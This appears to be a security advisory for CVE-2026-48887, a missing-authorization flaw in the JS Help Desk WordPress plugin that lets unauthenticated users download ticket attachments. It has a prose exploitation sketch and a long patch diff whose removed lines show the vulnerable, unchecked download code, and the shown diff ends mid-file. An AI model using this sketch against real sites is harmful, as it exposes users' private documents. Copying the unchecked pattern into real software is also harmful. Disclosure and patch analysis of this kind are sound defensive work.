Published : June 21, 2026

CVE-2026-48887: JS Help Desk – AI-Powered Support & Ticketing System <= 3.0.9 Missing Authorization PoC, Patch Analysis & Rule

CVE ID CVE-2026-48887
Plugin js-support-ticket
Severity Medium (CVSS 5.3)
CWE 862
Vulnerable Version 3.0.9
Patched Version 3.1.0
Disclosed June 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-48887:

The JS Help Desk – AI-Powered Support & Ticketing System plugin for WordPress (versions up to and including 3.0.9) contains a missing authorization vulnerability in the attachment download functionality. This allows unauthenticated attackers to download any attachment from any ticket without proper permission checks.

The root cause is a missing capability check in the `getAllDownloads()` function located in `/js-support-ticket/modules/attachment/model.php`. The vulnerable code path (lines 259-280) lacks any authorization validation before processing download requests. The function retrieves attachments using the `$jsst_downloadid` parameter from user input without verifying if the requesting user has permission to access that ticket’s attachments. The `deleteattachment()` function in the controller file only validates IDs via `absint()` but does not enforce ownership or role checks.

An attacker can exploit this vulnerability by sending a direct request to the WordPress AJAX handler with the appropriate action parameter that triggers the `getAllDownloads()` method. By providing a numeric ticket ID, the attacker retrieves attachment metadata and files. The fix adds user context checks: it checks for admin capability (`current_user_can(‘manage_options’)`), agent status, and ticket ownership for regular users. Unauthenticated users are blocked unless they can validate as a visitor.

The patch (in version 3.1.0) adds a conditional block at the start of `getAllDownloads()` that performs proper authorization. Before the patch, any user could request any ticket’s attachments. After the patch, the code verifies the user is either an admin, an agent, or the ticket owner before allowing download access. This completely closes the authorization gap.

Impact: Unauthenticated attackers can download any file attached to any ticket in the system. This includes sensitive documents such as identification files, screenshots, and other confidential data uploaded by support ticket users. The exposure of such data could lead to privacy violations, identity theft, or corporate data leakage.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff 
--- a/js-support-ticket/includes/activation.php
+++ b/js-support-ticket/includes/activation.php
@@ -201,8 +201,8 @@
                     ('tplink_faqs_user', '0', 'tplink', 'faq'),
                     ('show_breadcrumbs', '1', 'default', NULL),
                     ('productcode', 'jsticket', 'default', NULL),
-                    ('versioncode', '3.0.9', 'default', NULL),
-                    ('productversion', '309', 'default', NULL),
+                    ('versioncode', '3.1.0', 'default', NULL),
+                    ('productversion', '310', 'default', NULL),
                     ('producttype', 'free', 'default', NULL),
                     ('tve_enabled', '2', 'default', NULL),
                     ('tve_mailreadtype', '3', 'default', NULL),
--- a/js-support-ticket/includes/classes/customfields.php
+++ b/js-support-ticket/includes/classes/customfields.php
@@ -610,7 +610,7 @@
         if (!is_admin()) {
             $jsst_inquery .= ' AND adminonly != 1 ';
         }
-        $jsst_query = "SELECT field,fieldtitle,isuserfield,userfieldtype,userfieldparams,multiformid  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $jsst_published . " AND fieldfor =" . esc_sql($jsst_fieldfor) . $jsst_inquery. " AND multiformid =" . esc_sql($jsst_multiformid). " ORDER BY ordering";
+        $jsst_query = "SELECT field,fieldtitle,isuserfield,userfieldtype,userfieldparams,multiformid  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $jsst_published . " AND fieldfor =" . intval($jsst_fieldfor) . $jsst_inquery. " AND multiformid =" . intval($jsst_multiformid). " ORDER BY ordering";
         $jsst_data = jssupportticket::$_db->get_results($jsst_query);
         return $jsst_data;
     }
@@ -628,7 +628,7 @@
             $jsst_inquery .= " AND adminonly != 1";
         }

-        $jsst_query = "SELECT `rows`,`cols`,required,field,fieldtitle,isuserfield,userfieldtype,userfieldparams,depandant_field  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $jsst_inquery . " AND fieldfor =" . esc_sql($jsst_fieldfor) ." ORDER BY ordering ";
+        $jsst_query = "SELECT `rows`,`cols`,required,field,fieldtitle,isuserfield,userfieldtype,userfieldparams,depandant_field  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $jsst_inquery . " AND fieldfor =" . intval($jsst_fieldfor) ." ORDER BY ordering ";
         $jsst_data = jssupportticket::$_db->get_results($jsst_query);
         return $jsst_data;
     }
@@ -638,7 +638,7 @@
             return false;
         }

-        $jsst_query = "SELECT `rows`,`cols`,required,field,fieldtitle,isuserfield,userfieldtype,userfieldparams,depandant_field  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND published = 1 AND search_admin =1 AND fieldfor =" . esc_sql($jsst_fieldfor) ." ORDER BY ordering ";
+        $jsst_query = "SELECT `rows`,`cols`,required,field,fieldtitle,isuserfield,userfieldtype,userfieldparams,depandant_field  FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND published = 1 AND search_admin =1 AND fieldfor =" . intval($jsst_fieldfor) ." ORDER BY ordering ";
         $jsst_data = jssupportticket::$_db->get_results($jsst_query);
         return $jsst_data;
     }
--- a/js-support-ticket/includes/classes/uploads.php
+++ b/js-support-ticket/includes/classes/uploads.php
@@ -23,7 +23,7 @@
             if($this->jsst_uploadfor == 'ticket'){
                 if(!is_numeric($this->jsst_ticketid)) return false;
                 $jsst_path = $jsst_path . '/ticket';
-                $jsst_query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".esc_sql($this->jsst_ticketid);
+                $jsst_query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".intval($this->jsst_ticketid);
                 $jsst_foldername = jssupportticket::$_db->get_var($jsst_query);
             }elseif($this->jsst_uploadfor == 'article'){
                 $jsst_path = $jsst_path . '/articles/article_'.$this->jsst_articleid;
--- a/js-support-ticket/includes/classes/user.php
+++ b/js-support-ticket/includes/classes/user.php
@@ -15,7 +15,7 @@
             $jsst_wpuserid = get_current_user_id();
             if (!is_numeric($jsst_wpuserid))
                 return false;
-            $jsst_query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($jsst_wpuserid);
+            $jsst_query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . intval($jsst_wpuserid);
             $jsst_currentuser = jssupportticket::$_db->get_row($jsst_query);
             $jsst_jssupportticket_registerform = JSSTrequest::getVar('jsst_support_register_nonce', 'post', '');
             $jsst_registerform = JSSTrequest::getVar('jssupportticket_registerform', 'post', 0);
@@ -66,7 +66,7 @@
                 $jsst_row->store();

                 if (is_numeric($jsst_row->id)) {
-                    $jsst_query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . esc_sql($jsst_row->id);
+                    $jsst_query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . intval($jsst_row->id);
                     $jsst_currentuser = jssupportticket::$_db->get_results($jsst_query);
                 }
             }
@@ -168,7 +168,7 @@
             $jsst_wpuserid = JSSTincluder::getObjectClass('user')->uid();
             if (!is_numeric($jsst_wpuserid))
                 return false;
-            $jsst_query = "SELECT COUNT(id) FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($jsst_wpuserid);
+            $jsst_query = "SELECT COUNT(id) FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . intval($jsst_wpuserid);
             $jsst_result = jssupportticket::$_db->get_results($jsst_query);
             if ($jsst_result > 0) {
                 return true;
@@ -200,7 +200,7 @@
     function getjssupportticketuidbyuserid($jsst_userid)
     {
         if (!is_numeric($jsst_userid)) return false;
-        $jsst_query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($jsst_userid);
+        $jsst_query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . intval($jsst_userid);
         $jsst_uid = jssupportticket::$_db->get_results($jsst_query);
         return $jsst_uid;
     }
@@ -213,7 +213,7 @@
         if (!is_numeric($jsst_uid)) return false;

         $jsst_model = JSSTincluder::getJSModel('ticket');
-        $jsst_query = "SELECT id, ticketid FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` WHERE wpuid = " . esc_sql($jsst_uid);
+        $jsst_query = "SELECT id, ticketid FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` WHERE wpuid = " . intval($jsst_uid);
         $jsst_tickets = jssupportticket::$_db->get_results($jsst_query);

         do_action('jsst_addon_deletequery_for_user');
@@ -225,11 +225,11 @@
             LEFT JOIN `" . jssupportticket::$_db->prefix . "js_ticket_activity_log` AS activity_log ON activity_log.uid = user.id
             LEFT JOIN `" . jssupportticket::$_db->prefix . "js_ticket_erasedatarequests` AS erasedatarequests ON erasedatarequests.uid = user.id
             " . jssupportticket::$_addon_query['join'] . "
-            WHERE user.id = " . esc_sql($jsst_uid);
+            WHERE user.id = " . intval($jsst_uid);
         jssupportticket::$_db->query($jsst_query);

         do_action('jsst_reset_aadon_query');
-        $jsst_query = "DELETE user FROM `" . jssupportticket::$_db->prefix . "js_ticket_users` AS user WHERE wpuid = " . esc_sql($jsst_uid);
+        $jsst_query = "DELETE user FROM `" . jssupportticket::$_db->prefix . "js_ticket_users` AS user WHERE wpuid = " . intval($jsst_uid);

         if (jssupportticket::$_db->query($jsst_query)) {
             // --- START FILESYSTEM FIX ---
@@ -262,7 +262,7 @@
         if (!is_numeric($jsst_wpuid))
             return false;

-        $jsst_query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($jsst_wpuid);
+        $jsst_query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . intval($jsst_wpuid);
         $jsst_result = jssupportticket::$_db->get_var($jsst_query);
         return $jsst_result;
     }
@@ -271,7 +271,7 @@
         if (!is_numeric($jsst_uid))
             return false;

-        $jsst_query = "SELECT display_name,user_nicename FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . esc_sql($jsst_uid);
+        $jsst_query = "SELECT display_name,user_nicename FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . intval($jsst_uid);
         $jsst_result = jssupportticket::$_db->get_row($jsst_query);
         return $jsst_result;
     }
--- a/js-support-ticket/includes/includer.php
+++ b/js-support-ticket/includes/includer.php
@@ -15,7 +15,7 @@

     public static function include_file($jsst_filename, $jsst_module_name = null) {
         $allowed_modules = array(
-            'activitylog','attachment','configuration','department','email','emailtemplate','fieldordering','gdpr','jssupportticket','postinstallation','premiumplugin','priority','product','reply','reports','slug','status','systemerror','themes','thirdpartyimport','ticket','actions','agent','role','roleaccessdepartments','rolepermissions','useraccessdepartments','userpermissions','agentautoassign','aipoweredreply','announcement','autoclose','banemail','banemaillog','cannedresponses','dashboardwidgets','download','easydigitaldownloads','emailcc','emailpiping','envatovalidation','export','faq','feedback','helptopic','knowledgebase','mail','mailchimp','maxticket','mergeticket','multiform','multilanguageemailtemplates','note','notification','overdue','paidsupport','privatecredentials','smtp','sociallogin','themes','tickethistory','timetracking','useroptions','widgets','woocommerce','downloadattachment','articleattachmet','actions','actions','actions','actions','actions',
+            'activitylog','attachment','configuration','department','email','emailtemplate','fieldordering','gdpr','jssupportticket','postinstallation','premiumplugin','priority','product','reply','reports','slug','status','systemerror','themes','thirdpartyimport','ticket','actions','agent','role','roleaccessdepartments','rolepermissions','useraccessdepartments','userpermissions','agentautoassign','aipoweredreply','announcement','autoclose','banemail','banemaillog','cannedresponses','dashboardwidgets','download','zywrap','easydigitaldownloads','emailcc','emailpiping','envatovalidation','export','faq','feedback','helptopic','knowledgebase','mail','mailchimp','maxticket','mergeticket','multiform','multilanguageemailtemplates','note','notification','overdue','paidsupport','privatecredentials','smtp','sociallogin','themes','tickethistory','timetracking','useroptions','widgets','woocommerce','downloadattachment','articleattachmet','actions','actions','actions','actions','actions',
         );

         if (
--- a/js-support-ticket/includes/jsst-hooks.php
+++ b/js-support-ticket/includes/jsst-hooks.php
@@ -287,7 +287,7 @@
     if(!is_numeric($jsst_user_id)){
         return false;
     }
-    $jsst_query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "users` WHERE id = " . esc_sql($jsst_user_id);
+    $jsst_query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "users` WHERE id = " . intval($jsst_user_id);
     $jsst_user = jssupportticket::$_db->get_row($jsst_query);

     $jsst_uid = "";
@@ -299,7 +299,7 @@

 	if(isset($_POST['user_id'])) $jsst_post_user_id = jssupportticket::JSST_sanitizeData($_POST['user_id']); // JSST_sanitizeData() function uses wordpress santize functions
     if ($jsst_post_user_id == $jsst_user_id) {
-        $jsst_query = "SELECT id FROM `" . jssupportticket::$_db->prefix . "js_ticket_users` WHERE wpuid = " . esc_sql($jsst_user_id);
+        $jsst_query = "SELECT id FROM `" . jssupportticket::$_db->prefix . "js_ticket_users` WHERE wpuid = " . intval($jsst_user_id);
         $jsst_id = jssupportticket::$_db->get_var($jsst_query);
     }
 	$jsst_name = "";
--- a/js-support-ticket/includes/permissions.php
+++ b/js-support-ticket/includes/permissions.php
@@ -12,7 +12,7 @@
         $jsst_query = "SELECT perm_allowed.status
 					FROM `" . jsjobs::$_db->prefix . "jsjobs_permissions` AS perm
 					JOIN `" . jsjobs::$_db->prefix . "jsjobs_permissions_allowed` AS perm_allowed ON perm_allowed.permissionid = perm.id
-					WHERE perm.permissions = '".esc_sql($jsst_permissionfor)."' AND perm_allowed.userid = ".esc_sql($jsst_userid);
+					WHERE perm.permissions = '".esc_sql($jsst_permissionfor)."' AND perm_allowed.userid = ".intval($jsst_userid);
         $jsst_result = jsjobs::$_db->get_var($jsst_query);
         return $jsst_result;
     }
--- a/js-support-ticket/js-support-ticket.php
+++ b/js-support-ticket/js-support-ticket.php
@@ -1,17 +1,13 @@
 <?php

-/**
- * @package JS Help Desk
- * @author Ahmad Bilal
- * @version 3.0.9
- */
 /*
   Plugin Name: JS Help Desk – AI-Powered Support & Ticketing System
   Plugin URI: https://www.jshelpdesk.com
   Description: JS Help Desk is a trusted open source ticket system. JS Help Desk is a simple, easy to use, web-based customer support system. User can create ticket from front-end. JS Help Desk comes packed with lot features than most of the expensive(and complex) support ticket system on market. JS Help Desk provide you best industry help desk system.
   Author: JS Help Desk
-  Version: 3.0.9
+  Version: 3.1.0
   Text Domain: js-support-ticket
+  Domain Path: /languages
   License: GPLv3
   Author URI: https://www.jshelpdesk.com
  */
@@ -67,7 +63,7 @@
         self::$jsst_data = array();
         self::$_search = array();
         self::$_captcha = array();
-        self::$_currentversion = '309';
+        self::$_currentversion = '310';
         self::$_addon_query = array('select'=>'','join'=>'','where'=>'');
         self::$_jshdsession = JSSTincluder::getObjectClass('wphdsession');
         global $wpdb;
@@ -147,7 +143,7 @@
                     // restore colors data end
                     update_option('jsst_currentversion', self::$_currentversion);
                     include_once JSST_PLUGIN_PATH . 'includes/updates/updates.php';
-                    JSSTupdates::checkUpdates('309');
+                    JSSTupdates::checkUpdates('310');
                     JSSTincluder::getJSModel('jssupportticket')->updateColorFile();
                     JSSTincluder::getJSModel('jssupportticket')->jsst_check_license_status();
                     JSSTincluder::getJSModel('jssupportticket')->JSSTAddonsAutoUpdate();
@@ -1544,7 +1540,7 @@
     // in case if user is agent
     if ( in_array('agent',jssupportticket::$_active_addons)) {
         $jsst_query = "
-        SELECT id, photo FROM `" . jssupportticket::$_db->prefix."js_ticket_staff` AS staff WHERE staff.uid = ".esc_sql($jsst_uid);
+        SELECT id, photo FROM `" . jssupportticket::$_db->prefix."js_ticket_staff` AS staff WHERE staff.uid = ".intval($jsst_uid);
         $jsst_staff_data = jssupportticket::$_db->get_row($jsst_query);
         if (!empty($jsst_staff_data->photo)) {
             $jsst_maindir = wp_upload_dir();
--- a/js-support-ticket/modules/attachment/controller.php
+++ b/js-support-ticket/modules/attachment/controller.php
@@ -55,7 +55,7 @@
         exit;
     }

-        static function deleteattachment() {
+    static function deleteattachment() {

         $jsst_id        = absint( JSSTrequest::getVar( 'id' ) );
         $jsst_ticket_id = absint( JSSTrequest::getVar( 'ticketid' ) );
--- a/js-support-ticket/modules/attachment/model.php
+++ b/js-support-ticket/modules/attachment/model.php
@@ -10,7 +10,7 @@
             return false;
         $jsst_query = "SELECT filename,filesize,id
                     FROM `" . jssupportticket::$_db->prefix . "js_ticket_attachments`
-                    WHERE ticketid = " . esc_sql($jsst_id) . " and replyattachmentid = 0";
+                    WHERE ticketid = " . intval($jsst_id) . " and replyattachmentid = 0";
         jssupportticket::$jsst_data[5] = jssupportticket::$_db->get_results($jsst_query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -25,7 +25,7 @@
             return false;
         $jsst_query = "SELECT filename,filesize,id
                     FROM `" . jssupportticket::$_db->prefix . "js_ticket_attachments`
-                    WHERE ticketid = " . esc_sql($jsst_id) . " AND replyattachmentid = " . esc_sql($jsst_replyattachmentid);
+                    WHERE ticketid = " . intval($jsst_id) . " AND replyattachmentid = " . intval($jsst_replyattachmentid);
         $jsst_result = jssupportticket::$_db->get_results($jsst_query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -77,7 +77,7 @@
         $jsst_query = $jsst_query = "SELECT ticket.attachmentdir AS foldername,ticket.id AS ticketid,attach.filename  "
                 . " FROM `".jssupportticket::$_db->prefix."js_ticket_attachments` AS attach "
                 . " JOIN `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket ON ticket.id = attach.ticketid "
-                . " WHERE attach.id = ". esc_sql($jsst_id);
+                . " WHERE attach.id = ". intval($jsst_id);
         $jsst_obj = jssupportticket::$_db->get_row($jsst_query);
         $jsst_filename = $jsst_obj->filename;
         $jsst_foldername = $jsst_obj->foldername;
@@ -107,7 +107,7 @@
         $jsst_query = "SELECT ticket.attachmentdir AS foldername,ticket.id AS ticketid,attach.filename  "
                 . " FROM `".jssupportticket::$_db->prefix."js_ticket_attachments` AS attach "
                 . " JOIN `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket ON ticket.id = attach.ticketid "
-                . " WHERE attach.id = ". esc_sql($jsst_id);
+                . " WHERE attach.id = ". intval($jsst_id);
         $jsst_object = jssupportticket::$_db->get_row($jsst_query);
         $jsst_datadirectory = jssupportticket::$_config['data_directory'];
         $jsst_foldername = $jsst_object->foldername;
@@ -128,7 +128,7 @@
         $jsst_query = "SELECT ticket.attachmentdir AS foldername,ticket.id AS ticketid,attach.filename  "
                 . " FROM `".jssupportticket::$_db->prefix."js_ticket_attachments` AS attach "
                 . " JOIN `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket ON ticket.id = attach.ticketid "
-                . " WHERE attach.id = ". esc_sql($jsst_id);
+                . " WHERE attach.id = ". intval($jsst_id);
         $jsst_object = jssupportticket::$_db->get_row($jsst_query);
         $jsst_foldername = $jsst_object->foldername;
         $jsst_ticketid = $jsst_object->ticketid;
@@ -259,6 +259,22 @@

     function getAllDownloads() {
         $jsst_downloadid = JSSTrequest::getVar('downloadid');
+        //if not admin and agent
+        // check for ticket owner only in case of user
+        if(!current_user_can('manage_options') && !(in_array('agent',jssupportticket::$_active_addons) && JSSTincluder::getJSModel('agent')->isUserStaff())){
+            // in case of user check for ticket owner
+            if (!JSSTincluder::getObjectClass('user')->isguest()) {
+                $jsst_current_uid = JSSTincluder::getObjectClass('user')->uid();
+                $jsst_ticket_uid = JSSTincluder::getJSModel('ticket')->getUIdById($jsst_downloadid);
+                if ($jsst_current_uid != $jsst_ticket_uid) {
+                    return;
+                }
+            } else {
+                if (!JSSTincluder::getJSModel('ticket')->validateTicketDetailForVisitor($jsst_downloadid)) {
+                    return;
+                }
+            }
+        }
         $jsst_ticketattachment = JSSTincluder::getJSModel('ticket')->getAttachmentByTicketId($jsst_downloadid);

         if(!class_exists('PclZip')){
--- a/js-support-ticket/modules/department/model.php
+++ b/js-support-ticket/modules/department/model.php
@@ -51,7 +51,7 @@
             $jsst_query = "SELECT department.*,email.email AS outgoingemail
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS department
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_email` AS email ON email.id = department.emailid
-                        WHERE department.id = " . esc_sql($jsst_id);
+                        WHERE department.id = " . intval($jsst_id);
             jssupportticket::$jsst_data[0] = jssupportticket::$_db->get_row($jsst_query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError(); // if there is an error add it to system errorrs
@@ -94,7 +94,7 @@
                 $jsst_emailaddresses = array();
             }
             $jsst_query = "SELECT email FROM `" . jssupportticket::$_db->prefix . "js_ticket_email`
-                WHERE id = ".esc_sql($jsst_data['emailid']);
+                WHERE id = ".intval($jsst_data['emailid']);
             $jsst_email = jssupportticket::$_db->get_var($jsst_query);

             foreach ($jsst_emailaddresses as $jsst_edata) {
@@ -161,7 +161,7 @@
             $jsst_order = "<";
             $jsst_direction = "DESC";
         }
-        $jsst_query = "SELECT t.ordering,t.id,t2.ordering AS ordering2 FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t,`" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t2 WHERE t.ordering $jsst_order t2.ordering AND t2.id = ".esc_sql($jsst_id)." ORDER BY t.ordering $jsst_direction LIMIT 1";
+        $jsst_query = "SELECT t.ordering,t.id,t2.ordering AS ordering2 FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t,`" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t2 WHERE t.ordering $jsst_order t2.ordering AND t2.id = ".intval($jsst_id)." ORDER BY t.ordering $jsst_direction LIMIT 1";
         $jsst_result = jssupportticket::$_db->get_row($jsst_query);

         $jsst_row = JSSTincluder::getJSTable('departments');
@@ -191,7 +191,7 @@
                 if(in_array('agent',jssupportticket::$_active_addons)){
                     $jsst_query = "DELETE
                                 FROM `".jssupportticket::$_db->prefix . "js_ticket_acl_role_access_departments`
-                                WHERE departmentid = ".esc_sql($jsst_id);
+                                WHERE departmentid = ".intval($jsst_id);
                     jssupportticket::$_db->query($jsst_query);
                 }
                 JSSTmessage::setMessage(esc_html(__('The department has been deleted', 'js-support-ticket')), 'updated');
@@ -209,19 +209,19 @@
         if (!is_numeric($jsst_id))
             return false;
         $jsst_query = "SELECT (
-                    (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` WHERE departmentid = " . esc_sql($jsst_id) . ")
-                    + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . esc_sql($jsst_id) . " AND isdefault = 1) ";
+                    (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` WHERE departmentid = " . intval($jsst_id) . ")
+                    + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . intval($jsst_id) . " AND isdefault = 1) ";

                     if(in_array('agent', jssupportticket::$_active_addons)){
-                        $jsst_query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_acl_user_access_departments` WHERE departmentid = " . esc_sql($jsst_id) . ") ";
+                        $jsst_query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_acl_user_access_departments` WHERE departmentid = " . intval($jsst_id) . ") ";
                     }

                     if(in_array('helptopic', jssupportticket::$_active_addons)){
-                        $jsst_query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE departmentid = " . esc_sql($jsst_id) . ") ";
+                        $jsst_query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE departmentid = " . intval($jsst_id) . ") ";
                     }

                     if(in_array('cannedresponses', jssupportticket::$_active_addons)){
-                        $jsst_query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE departmentid = " . esc_sql($jsst_id) . ")";
+                        $jsst_query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE departmentid = " . intval($jsst_id) . ")";
                     }

                     $jsst_query .= " ) AS total";
@@ -251,7 +251,7 @@
     function changeStatus($jsst_id) {
         if (!is_numeric($jsst_id))
             return false;
-        $jsst_query = "SELECT status  FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id=" . esc_sql($jsst_id);
+        $jsst_query = "SELECT status  FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id=" . intval($jsst_id);
            $jsst_status = jssupportticket::$_db->get_var($jsst_query);
        $jsst_status = 1 - $jsst_status;

@@ -269,10 +269,10 @@
         if (!is_numeric($jsst_id))
             return false;

-        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 0 WHERE id != " . esc_sql($jsst_id);
+        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 0 WHERE id != " . intval($jsst_id);
         jssupportticket::$_db->query($jsst_query);

-        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 1 - $jsst_default WHERE id=" . esc_sql($jsst_id);
+        $jsst_query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 1 - $jsst_default WHERE id=" . intval($jsst_id);
         jssupportticket::$_db->query($jsst_query);

         if (jssupportticket::$_db->last_error == null) {
@@ -298,7 +298,7 @@
             return false;
         }

-        $jsst_query = "SELECT id, topic AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE status = 1 AND departmentid = " . esc_sql($jsst_departmentid) . " ORDER BY ordering ASC";
+        $jsst_query = "SELECT id, topic AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE status = 1 AND departmentid = " . intval($jsst_departmentid) . " ORDER BY ordering ASC";
         $jsst_list = jssupportticket::$_db->get_results($jsst_query);

         $jsst_query = "SELECT required FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE field='helptopic'";
@@ -322,7 +322,7 @@
         $jsst_departmentid = JSSTrequest::getVar('val');
         if (!is_numeric($jsst_departmentid))
             return false;
-        $jsst_query = "SELECT id, title AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE status = 1 AND departmentid = " . esc_sql($jsst_departmentid);
+        $jsst_query = "SELECT id, title AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE status = 1 AND departmentid = " . intval($jsst_departmentid);
         $jsst_query .= " ORDER BY title ASC ";
         $jsst_list = jssupportticket::$_db->get_results($jsst_query);
         $jsst_combobox = false;
@@ -352,7 +352,7 @@
     function getSignatureByID($jsst_id) {
         if (!is_numeric($jsst_id))
             return false;
-        $jsst_query = "SELECT departmentsignature FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . esc_sql($jsst_id);
+        $jsst_query = "SELECT departmentsignature FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . intval($jsst_id);
         $jsst_signature = jssupportticket::$_db->get_var($jsst_query);
         return $jsst_signature;
     }
@@ -360,7 +360,7 @@
     function getDepartmentById($jsst_id) {
         if (!is_numeric($jsst_id))
             return false;
-        $jsst_query = "SELECT departmentname FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . esc_sql($jsst_id);
+        $jsst_query = "SELECT departmentname FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . intval($jsst_id);
         $jsst_departmentname = jssupportticket::$_db->get_var($jsst_query);
         return $jsst_departmentname;
     }
--- a/js-support-ticket/modules/email/model.php
+++ b/js-support-ticket/modules/email/model.php
@@ -110,7 +110,7 @@
                                     FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket
                                     LEFT JOIN `".jssupportticket::$_db->prefix."js_ticket_departments` AS dept ON dept.id = ticket.departmentid
                                     LEFT JOIN `".jssupportticket::$_db->prefix."js_ticket_email` AS email ON email.id = dept.emailid
-                                    WHERE ticket.id = ".esc_sql($jsst_id);
+                                    WHERE ticket.id = ".intval($jsst_id);
                         $jsst_dept_result = jssupportticket::$_db->get_row($jsst_query);
                         if($jsst_dept_result){
                             if(isset($jsst_dept_result->sendmail) && $jsst_dept_result->sendmail == 1){
@@ -1880,19 +1880,19 @@
             $jsst_query = "SELECT mail.subject,mail.message,CONCAT(staff.firstname,' ',staff.lastname) AS sendername, staff.uid as staffuid
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS mail
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff ON staff.id = mail.fromid
-                        WHERE mail.id = " . esc_sql($jsst_id);
+                        WHERE mail.id = " . intval($jsst_id);
         } else {
             $jsst_query = "SELECT mail.subject,reply.message,CONCAT(staff.firstname,' ',staff.lastname) AS sendername, staff.uid as staffuid
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS reply
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS mail ON mail.id = reply.replytoid
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff ON staff.id = reply.fromid
-                        WHERE reply.id = " . esc_sql($jsst_id);
+                        WHERE reply.id = " . intval($jsst_id);
         }
         $jsst_result = jssupportticket::$_db->get_row($jsst_query);
             $jsst_query = "SELECT staff.email
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS mail
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff ON staff.id = mail.toid
-                        WHERE mail.id = " . esc_sql($jsst_id);
+                        WHERE mail.id = " . intval($jsst_id);
